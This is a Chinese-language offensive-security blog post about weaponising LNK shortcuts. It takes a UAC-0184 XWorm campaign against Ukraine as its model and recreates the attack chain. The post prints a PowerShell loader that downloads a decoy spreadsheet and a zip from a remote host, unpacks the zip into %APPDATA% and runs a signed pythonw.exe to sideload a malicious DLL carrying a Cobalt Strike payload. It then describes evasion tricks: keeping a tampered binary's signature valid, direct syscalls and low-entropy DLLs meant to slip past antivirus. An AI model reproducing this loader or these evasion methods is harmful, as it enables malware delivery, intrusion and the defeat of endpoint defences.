lnk快捷方式白加黑武器化

看下这篇文章，翻译过来是“UAC-0184的恶意软件活动使用XWORM RAT针对乌克兰，利用 Python 进行 DLL 侧加载。”^[1]。

依然是网络钓鱼ZIP压缩文件，内含lnk 快捷方式NewCopy.xlsx.lnk，执行后，下载“pkg.zip”至%appdata%下，解压至创建的SecurityCheck的文件夹中，然后下载打开一个真的NewCopy.xlsx（诱饵Excel）文件。最后运行文件夹中的pythonw.exe通过DLL侧加载python310.dll，加载XWorm远控有效载荷上线。后面的Process Hollowing注入合法进程MSBuild就先不说了。

今天我们来看下这个操作。

技术采用：

编号	技术	详细	版本
1	白加黑工具	《白加黑有效载荷注入工具》	发布
2	lnk快捷方式	《lnk快捷方式》	发布
3	cobaltstrike		暂无更新

lnk快捷方式

执行lnk后远程下载一个同名文档至temp目录，然后打开迷惑用户，下载pkg.zip，检查appdata是否存在SecurityCheck目录，不存在则创建，然后下载一个pkg.zip，解压至该目录，删除zip，启动白名单文件pythonw.exe，通过DLL侧加载方法加载名为python310.dll的恶意DLL，DLL加载pythonw.exe存储的cobaltstrike有效载荷。

部分代码：

'Invoke-WebRequest -Uri "http://192.168.136.143/NewCopy.xlsx" -OutFile "$env:TEMP\NewCopy.xlsx"; '  # 下载 Excel 文件到 Temp 目录'Start-Process -FilePath "$env:TEMP\NewCopy.xlsx";'  # 启动 Excel 文件'if (-Not (Test-Path "$env:APPDATA\SecurityCheck")) { New-Item -ItemType Directory -Path "$env:APPDATA\SecurityCheck" | Out-Null }; '  # 创建文件夹'Invoke-WebRequest -Uri "http://192.168.136.143/pkg.zip" -OutFile "$env:APPDATA\SecurityCheck\pkg.zip"; '  # 下载 ZIP 文件'Expand-Archive -Path "$env:APPDATA\SecurityCheck\pkg.zip" -DestinationPath "$env:APPDATA\SecurityCheck" -Force; '  # 解压 ZIP 文件'Remove-Item -Path "$env:APPDATA\SecurityCheck\pkg.zip" -Force; '  # 删除 ZIP 文件'Start-Process -FilePath "$env:APPDATA\SecurityCheck\pythonw.exe";'  # 执行程序

白加黑工具：

传统白加黑通常将shellcode写入至dll中，但这样存在两个问题，一是文件熵值非常高，导致很容易被查杀。二是shellcode难以使用，越是复杂的C2，其shellcode将非常大，难以放置于普通加载器中使用，正因如此，在4.10版本的cobatstrike中，官方已将raw作为默认导出的有效载荷。由于我们的bin已使用插件进行了特征修补，我们需要使用bin格式作为有效载荷，而不是使用shellcode。

数字签名通常是为了防止未经授权的修改，一旦文件被篡改，签名就会失效。但技术通常会颠覆你的认知，修改带签名的EXE后，签名可以仍然有效。

这是python官方文件，将payload_x64.bin注入文件中。原文件100KB修改后533KB，数字签名依然有效。

由于pythonw.exe具备有效数字签名，杀毒软件默认放行。

dll采用系统调用，敏感函数命中大幅减少，难以被查杀。

dll熵值为5，看上去非常正常。